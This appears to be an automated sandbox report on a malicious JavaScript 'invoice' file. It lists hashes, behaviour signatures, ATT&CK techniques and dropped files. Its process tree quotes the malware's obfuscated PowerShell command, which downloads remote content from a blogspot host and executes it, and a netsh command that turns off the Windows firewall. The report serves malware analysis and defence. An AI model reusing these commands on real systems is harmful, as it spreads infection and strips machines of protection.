Overview

overview

10

Static

static

1

invoice_2566246817.js

windows7-x64

7

invoice_2566246817.js

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-12-2023 05:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    invoice_2566246817.js

  • Size

    106KB

  • MD5

    fc6d7a11059fee2eda2bab5e4c82c839

  • SHA1

    9907895c521bddd02573ca5e361490f017932dbe

  • SHA256

    39afb67d0916e6761f7604cb65ebdb1c115f24e62d9b122c0137b46215a0b00c

  • SHA512

    1e820c22e9cbd0f360b7187eb8062089ead22cfd1a62e0e47450523659b841bf37278ddfd530c4792529d88145ceb1ff88389d541fda9e68d9c127ba5579fb39

  • SSDEEP

    384:boJdyttnpXrov4gPyjjF/9sui+1VaEEEfEfffEfEffESxyOVYZPjcrdRoDT/8W8z:kS5W

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\invoice_2566246817.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:208
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c $((irm hotelofficeewn.blogspot.com////////////////////////////////////atom.xml) | .('{1}{0}'-f'kasokdaoskdoaksodkasodkaoskdoaksdoaksod','I').replace('kasokdaoskdoaksodkasodkaoskdoaksdoaksod','ex'))
      2⤵
      • UAC bypass
      • Blocklisted process makes network request
      • Registers COM server for autorun
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\12xfqybz\12xfqybz.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4296
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81B3.tmp" "c:\Users\Admin\AppData\Local\Temp\12xfqybz\CSC723BFB4059334DBFB1F69D1CD0DEDCE.TMP"
          4⤵
            PID:984
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
          3⤵
          • Modifies Windows Firewall
          PID:2896
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4132
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3420
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 780
            4⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:4176
        • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3216
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 780
            4⤵
            • Drops file in Windows directory
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:4288

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Persistence

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\12xfqybz\12xfqybz.dll
      Filesize

      3KB

      MD5

      cdee9f0fc587268fe90e164c0545bb90

      SHA1

      4ab0a2bbe7033de02de31259ca6dd6beb002c4b7

      SHA256

      3dcb780c1afe9cd6f30151578bd17b3a02633e6ab7fa170170bfc7eee83f4ec4

      SHA512

      96c466c7ce279df2598e14e4b6948e15eb0231d9f2b184f54ac8bf24bc33f104f7332b66e81283143dfb2a9ac0dec38cdaa16510da50115d1e0abb57de437cbd

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RES81B3.tmp
      Filesize

      1KB

      MD5

      4a94028e64a25edc93742d6f3abe6e4f

      SHA1

      6de0b9a3f1fc131ac0660b3173e869e0b5d2299c

      SHA256

      c7eba9283d60d0740fe4adef90bfbcc0e51dc7fb4b6bc32399df8a4f3bbc6ce8

      SHA512

      b4eedc61b4d96df347995e8c5cbc8c59388c6b8e4f50ab6ab9d22a519a8706d3d7a6ee4f12db8ced8ad6a5be8e2654273b31e505492294918f0c0b9cdb2ec48c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ynt5pkvl.42k.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\12xfqybz\12xfqybz.0.cs
      Filesize

      870B

      MD5

      e06ebf853695db38aaac82c9af297ae4

      SHA1

      ef98bacec5ac2ae3bf24aac8ed56935a25c1f064

      SHA256

      79c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344

      SHA512

      036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\12xfqybz\12xfqybz.cmdline
      Filesize

      369B

      MD5

      35740afef8f235f85d89c8bf1bb8e33f

      SHA1

      b1db4a9178ecdccf1d630deb12d5cbfe49635e52

      SHA256

      92446fcc104cfdc358e2d8b2d26441b2d54dd2d0babf52d1c59ad718ebd2d0c7

      SHA512

      694160a3345870b28fa032cf0e209b9d829877ea4365a738cea53bcdb82ac37973e9a9bc8a284c5f074de00131a5f7375763fe54d787bb17cb078776018a5021

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\12xfqybz\CSC723BFB4059334DBFB1F69D1CD0DEDCE.TMP
      Filesize

      652B

      MD5

      60be265dcff1940f9ef13caa226373c5

      SHA1

      7257d86bd983a888270b0891fba09bf8f43fa328

      SHA256

      8e21a202ce2568ffee1217f9d77e347ca0598fdf5d833714c088c1889d36f2f1

      SHA512

      3a11f461b150062c9380548b84333e6712ac36c0e5052f453dc3f54c9992c2e23365213577bc2afe3e8d9be1f591b7b62962e96217e51c06ef861d38c9dc02b3

      Download Submit

    • memory/3216-40-0x0000000074930000-0x0000000074EE1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3216-60-0x0000000074930000-0x0000000074EE1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3420-42-0x0000000001230000-0x0000000001240000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3420-38-0x0000000074930000-0x0000000074EE1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3420-49-0x0000000074930000-0x0000000074EE1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/4132-64-0x0000000006ED0000-0x0000000006F20000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4132-65-0x00000000070F0000-0x00000000072B2000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/4132-48-0x0000000005790000-0x00000000057F6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4132-31-0x0000000000400000-0x000000000046C000-memory.dmp

      Filesize

      432KB

      Download

    • memory/4132-36-0x0000000001100000-0x000000000116C000-memory.dmp

      Filesize

      432KB

      Download

    • memory/4132-66-0x0000000006FC0000-0x000000000705C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/4132-67-0x0000000006FA0000-0x0000000006FAA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4132-68-0x0000000074180000-0x0000000074930000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4132-39-0x0000000005DC0000-0x0000000006364000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/4132-41-0x0000000074180000-0x0000000074930000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4132-69-0x0000000005780000-0x0000000005790000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4132-45-0x00000000058B0000-0x0000000005942000-memory.dmp

      Filesize

      584KB

      Download

    • memory/5024-37-0x00007FFC6DAA0000-0x00007FFC6E561000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5024-52-0x00000148AD880000-0x00000148AD890000-memory.dmp

      Filesize

      64KB

      Download

    • memory/5024-30-0x0000014895460000-0x000001489547A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/5024-57-0x00000148AD880000-0x00000148AD890000-memory.dmp

      Filesize

      64KB

      Download

    • memory/5024-29-0x0000014895420000-0x000001489542E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/5024-63-0x00007FFC6DAA0000-0x00007FFC6E561000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5024-27-0x00000148AD860000-0x00000148AD868000-memory.dmp

      Filesize

      32KB

      Download

    • memory/5024-13-0x00000148AE0B0000-0x00000148AE272000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/5024-12-0x00000148AD880000-0x00000148AD890000-memory.dmp

      Filesize

      64KB

      Download

    • memory/5024-11-0x00000148AD880000-0x00000148AD890000-memory.dmp

      Filesize

      64KB

      Download

    • memory/5024-10-0x00007FFC6DAA0000-0x00007FFC6E561000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5024-5-0x00000148AD7D0000-0x00000148AD7F2000-memory.dmp

      Filesize

      136KB

      Download